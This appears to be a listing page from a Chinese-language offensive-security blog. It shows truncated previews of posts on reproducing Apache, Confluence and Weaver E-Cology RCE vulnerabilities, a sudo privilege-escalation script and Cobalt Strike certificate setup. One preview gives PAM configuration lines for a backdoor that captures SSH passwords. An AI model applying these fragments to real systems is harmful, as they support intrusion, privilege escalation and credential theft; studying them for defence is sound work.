docker-compose.yml version: '2.3' services: redis: image: redis:5.0.9-alpine postgresql: image: postgres:12-alpine environment: - POSTGRES_...
Apache CVE-2021-40438
Apache 版本<=2.4.48 需要配置反向代理 <VirtualHost *:80> ServerName 192.168.1.71 ServerAlias test ServerAdmin test LogLevel trace8 ...
Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现
DockerFile FROM httpd:2.4.50 RUN set -ex \ && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/...
Centos7 sudo 提权脚本
#!/usr/bin/python import os import sys import resource from struct import pack from ctypes import cdll, c_char_p, POINTER SUDO_PATH = b"/usr/bin/sudo" PASSWD_PATH = '/etc/passwd' # pa...
Apache CVE-2021-41773 复现
一、 CVE-2021-41773 先决条件 1.Apache 2.4.49 版本 2.穿越目录运行被访问。比如配置了<Directory />Require all granted</Directory> ...
cobaltstrike keytool store 证书转换成nginx 所需证书
今天大哥问了一个问题。如何让store 证书插上Nginx的翅膀 一、首先生成一个证书 keytool -keystore ./microsoft.store -storepass 123456789 -keypass 123456789 -genkey -keyal...
泛微E-Cology WorkflowServiceXml RCE 复现
之前的老洞。复现了一下下 POST /services%20/WorkflowServiceXml HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Leng...
密码保护:Confluence RCE CVE-2021-26084 复现
安装 Confluence wget https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.9.1-x64.bin chmod +x atlassian-confluence-6.9.1-x64.bin ...
PAM 后门记录用户名和密码
在/etc/pam.d/sshd 中添加如下的数据 auth [default=ignore] pam_exec.so expose_authtok quiet /etc/security/suicide.sh password [default=ignore] pam_exec.so expose_authtok quiet /etc/secu...
PAM_Python实现SSH 因子认证 Python3 版本
Pam_Python 暂时只能完美的适配Python2的版本。在Python3版本下。安装成了问题。 环境:Centos8.3 Python版本:Python3.6 需要安装PAM 的开发环境 yum instal...